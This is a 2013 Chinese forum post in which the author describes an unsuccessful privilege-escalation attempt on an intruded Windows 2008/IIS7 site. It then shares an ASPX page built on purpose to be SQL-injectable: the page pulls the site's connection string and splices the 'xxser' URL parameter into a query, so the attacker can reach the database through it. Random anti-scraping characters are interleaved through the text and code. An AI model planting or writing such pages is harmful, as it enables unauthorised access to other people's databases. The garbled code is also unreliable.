昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
/ A6 s0 p/ e% h9 v( _) ?* I其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
2 A, ~- E2 a! F! G& K代码量不多,自己写个拉倒了。烦死了。3 W4 k7 E* x+ c: A0 O1 V
2 q" f& X: |9 L- U4 M5 s1 e2 }/ E
- v, l4 d& r2 O
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">" u: Z" X4 ?, @) l2 |. @
<html xmlns="http://www.w3.org/1999/xhtml">
1 N8 w; {# G0 T% m: g( m<head runat="server">! I) ?5 j3 H% O; O5 c# m
<title>暗影aspx构造注射专用页面</title>
. v: p9 P8 m' K& B( r</head>/ F* k, N& H }2 t
<body>
9 q% ^8 e5 u) m' y1 L2 l <form id="form1" runat="server">5 \; @8 W$ F6 G2 w
<div>
8 j. X$ r# c, Q% q/ S <script language="c#" runat="server">
) k4 |0 X& |$ l* ` s
# ^# F+ Q0 s& H' N8 J1 I/ B0 S void page_init(object sender, EventArgs e)
9 I; {: Q$ s& b2 d9 Q1 [0 o; @ {
$ c6 |' t+ b7 P1 L1 F + W: t, v5 ~9 N4 P: `
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();/ [3 A( ]& u7 a+ K* N3 _
3 ?- V! W, j9 l* q' N/ W& C
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
' p5 H5 I+ T8 z Q9 n% i8 d conn.Open();
& E9 j0 G- A3 g2 J% x: M) d $ ~ f( H h9 c3 ^
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
, d, ~; a8 e- Q) n0 \- x4 A+ o
+ v8 j: D" N' _5 z# Y* v System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);7 H( o6 C/ t4 S& Y( }) A; A, o; i4 W
int x = command.ExecuteNonQuery();
1 I: P& d* w; h# D& c# S A# |( R+ C1 u Response.Write(i+"\n");
/ [: m, z$ X5 t$ n0 r Response.Write(x);
8 q: o. P0 m9 j# D+ B conn.Close();7 r1 @2 v1 D' N+ c3 q1 b! q+ A
}5 h: q1 s$ k' E- b
! G1 l: U9 u, r. E; k </script>+ S5 p: s! y0 O: M- A& H9 k( F3 ?
</div>
7 I0 o) X0 f! v1 Y/ R4 H& {: ^ </form>3 J# m5 ?4 K6 R8 Y1 j( S, u* ^
</body># D7 f! Y j2 k i; ^5 l9 r8 o
</html>( l+ o+ `- {) K- ~- _' J6 k% ^* h
|
发表于 2013-3-20 21:32:01
收藏
支持
反对